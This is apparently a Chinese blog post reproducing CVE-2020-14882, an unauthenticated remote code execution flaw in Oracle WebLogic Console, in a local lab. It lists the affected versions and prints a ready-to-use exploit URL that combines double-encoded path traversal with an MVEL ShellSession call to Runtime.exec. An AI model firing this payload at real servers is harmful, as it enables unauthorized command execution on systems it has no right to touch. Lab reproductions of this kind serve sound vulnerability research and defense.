点击蓝字 · 关注我们
简介:
漏洞概述
在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。
该漏洞能够在无需身份验证的情况下被触发,影响面较大。
未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。
官方给出的CVSS 评分为 9.8。
漏洞影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
漏洞复现
我在本地搭建了12.2.1.3.0版本的weblogic 访问http://ip:7001/console
环境搭建成功
Payload:
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27你想执行的命令%27);%22);
回到服务器查看/tmp文件夹下edisec文件已经创建
说明命令执行成功
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):cve-2020-14882复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论